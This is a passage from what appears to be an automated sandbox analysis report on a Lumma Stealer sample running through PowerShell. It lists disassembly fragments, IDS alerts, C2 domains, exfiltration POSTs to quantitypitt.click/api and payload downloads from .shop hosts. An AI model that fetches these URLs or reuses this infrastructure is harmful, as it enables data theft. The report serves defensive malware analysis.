                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 77282253h10_2_00441C20
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov dword ptr [esp+44h], 00000000h10_2_0040CCC6
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [edx+esi], 0000h10_2_004224E0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [edx], bl10_2_00409490
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, dword ptr [004578FCh]10_2_0044349D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], 4B884A2Eh10_2_00445CA0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0041BCB0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then test esi, esi10_2_0043F560
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h10_2_0041DD00
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1FEE02EFh]10_2_0042FDD9
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0B07DD58h]10_2_0042C5E8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edx, eax10_2_00420DF0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1FEE02EFh]10_2_0042FE1E
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov edi, edx10_2_00420EE0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then push esi10_2_00416EF1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov word ptr [eax], cx10_2_0041A6FB
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-1FEE02EFh]10_2_0042FD99
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx esi, word ptr [ecx]10_2_00415760
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edx-74166255h]10_2_0041DF75
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]10_2_00407700
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then movzx ecx, word ptr [ebp+edi*4+00h]10_2_00407700
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ebp, dword ptr [esp+18h]10_2_00415F02
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov ecx, eax10_2_00416F05
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], C18AD805h10_2_0040CF30
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h10_2_0042EFC0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4x nop then mov byte ptr [esi], al10_2_004317E9

                          Networking

                          barindex
                          Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49953 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49966 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49953 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49960 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49960 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50016 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.4:50015 -> 104.21.43.229:443
                          Source: Malware configuration extractorURLs: cloudewahsj.shop
                          Source: Malware configuration extractorURLs: noisycuttej.shop
                          Source: Malware configuration extractorURLs: quantitypitt.click
                          Source: Malware configuration extractorURLs: rabidcowse.shop
                          Source: Malware configuration extractorURLs: wholersorie.shop
                          Source: Malware configuration extractorURLs: framekgirus.shop
                          Source: Malware configuration extractorURLs: tirepublicerj.shop
                          Source: Malware configuration extractorURLs: abruptyopsn.shop
                          Source: Malware configuration extractorURLs: nearycrepso.shop
                          Source: global trafficHTTP traffic detected: GET /smugle.bd HTTP/1.1Host: cabf.klipdesak.shopConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
                          Source: Joe Sandbox ViewIP Address: 172.67.208.58 172.67.208.58
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49953 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49960 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49966 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49983 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49998 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49977 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50015 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50014 -> 104.21.43.229:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50017 -> 172.67.208.58:443
                          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:50016 -> 104.21.43.229:443
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8CD9VOT5VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18107Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=G657I2PEWUM93User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8752Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EU790BN3I2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20387Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OSRY9JPW5ZXN86XXQXUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 7128Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ZQKFUWF4DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 906Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=JE1C5LXKHUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 585170Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /smugle.bd HTTP/1.1Host: cabf.klipdesak.shopConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /int_clp_ldr_sha.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: klipvumisui.shop
                          Source: global trafficDNS traffic detected: DNS query: cabf.klipdesak.shop
                          Source: global trafficDNS traffic detected: DNS query: quantitypitt.click
                          Source: global trafficDNS traffic detected: DNS query: klipvumisui.shop
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: quantitypitt.click
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 06 Jan 2025 12:56:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hzBssKwIIaqXtOgg2llxYGSvbq%2FepLNC8EfLIHjgRSSDU5eCf0BPLuuUtpwI2o4BljANGRAMDpBm7n0aKeEyJf%2BJHIN27dM7Rx1sRX1LO3yD2AqV3eXvLk6AiQPB093uytmd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fdbdeb14a5a43eb-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1601&rtt_var=665&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2867&recv_bytes=824&delivery_rate=1823860&cwnd=183&unsent_bytes=0&cid=0b9c9eb9935bf8ed&ts=303&x=0"
                          Source: powershell.exe, 00000002.00000002.1876036563.000000000714B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftY
                          Source: powershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                          Source: powershell.exe, 00000002.00000002.1870496705.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                          Source: powershell.exe, 00000002.00000002.1870496705.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2600915739.00000000054D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2766998863.0000000005231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: powershell.exe, 00000002.00000002.1870496705.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                          Source: powershell.exe, 00000005.00000002.2633763630.0000000007A13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coIl
                          Source: powershell.exe, 00000002.00000002.1870496705.00000000048E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2600915739.00000000054D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2766998863.0000000005231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                          Source: powershell.exe, 00000002.00000002.1876036563.000000000714B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cabf.klipdesak.
                          Source: powershell.exe, 00000005.00000002.2600915739.0000000005625000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cabf.klipdesak.shop
                          Source: powershell.exe, 00000005.00000002.2634966545.0000000007AA1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2600915739.00000000054D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2633763630.0000000007980000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2598678946.0000000003250000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2600286866.0000000003660000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2599048878.0000000003445000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cabf.klipdesak.shop/smugle.bd
                          Source: powershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                          Source: powershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                          Source: powershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                          Source: powershell.exe, 0000000B.00000002.2766998863.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developers.cloudflare.com/r2/data-access/public-buckets/
                          Source: powershell.exe, 00000002.00000002.1870496705.0000000004A37000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                          Source: powershell.exe, 00000002.00000002.1870496705.0000000004BD4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                          Source: powershell.exe, 0000000A.00000002.2761981583.0000000005300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/
                          Source: powershell.exe, 0000000A.00000002.2761981583.0000000005300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/=
                          Source: powershell.exe, 0000000A.00000002.2761981583.0000000005300000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/M
                          Source: powershell.exe, 0000000A.00000002.2756836913.0000000002EFA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2755108073.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_ldr_sha.txt
                          Source: powershell.exe, 0000000A.00000002.2756836913.0000000002EFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_ldr_sha.txtQ
                          Source: powershell.exe, 00000002.00000002.1874036208.0000000005948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                          Source: powershell.exe, 0000000A.00000002.2755108073.0000000002EB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click/
                          Source: powershell.exe, 0000000A.00000002.2754093780.0000000002E98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2762059735.0000000005303000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quantitypitt.click/api
                          Source: powershell.exe, 0000000B.00000002.2766998863.000000000571C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/favicon.ico
                          Source: powershell.exe, 0000000B.00000002.2755371659.0000000003250000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/favicon.ico/
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
                          Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49741 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49953 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49960 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49966 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49977 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49983 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:49998 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:50014 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.43.229:443 -> 192.168.2.4:50016 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.4:50017 version: TLS 1.2
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00439230 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00439230
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00439230 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,10_2_00439230
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00439400 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,10_2_00439400

                          System Summary

                          barindex
                          Source: 5.2.powershell.exe.c973628.4.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: 5.2.powershell.exe.c973628.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                          Source: Process Memory Space: powershell.exe PID: 4628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 49%
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076C0BD8 NtResumeThread,5_2_076C0BD8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076C0BD0 NtResumeThread,5_2_076C0BD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0365CB405_2_0365CB40
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_036557445_2_03655744
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_03651B5D5_2_03651B5D
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07618E185_2_07618E18
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761D7285_2_0761D728
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761D7385_2_0761D738
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07618E095_2_07618E09
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761F53B5_2_0761F53B
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761B4E45_2_0761B4E4
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761B4E85_2_0761B4E8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761E0C05_2_0761E0C0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0761E0D05_2_0761E0D0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076150A85_2_076150A8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076150995_2_07615099
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076556185_2_07655618
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076500405_2_07650040
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076540015_2_07654001
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076543375_2_07654337
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076500065_2_07650006
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07650DC05_2_07650DC0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07650DB15_2_07650DB1
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0766EAC05_2_0766EAC0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07665A9F5_2_07665A9F
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076651795_2_07665179
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0766D1005_2_0766D100
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076651885_2_07665188
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076745985_2_07674598
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076876835_2_07687683
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0768BB985_2_0768BB98
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07685D105_2_07685D10
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0768BB925_2_0768BB92
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07689A385_2_07689A38
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07683AA85_2_07683AA8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07683AB85_2_07683AB8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076800405_2_07680040
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076800225_2_07680022
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A63A85_2_076A63A8
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A639A5_2_076A639A
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A6A605_2_076A6A60
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A862C5_2_076A862C
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076AFA005_2_076AFA00
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076AD5705_2_076AD570
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A00405_2_076A0040
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A00225_2_076A0022
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_076A00065_2_076A0006
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043E0E010_2_0043E0E0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040890010_2_00408900
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_004231D010_2_004231D0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0040B24010_2_0040B240
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0043E35010_2_0043E350
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_0041945610_2_00419456
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00411C9310_2_00411C93
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00426DD010_2_00426DD0
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00429E1010_2_00429E10
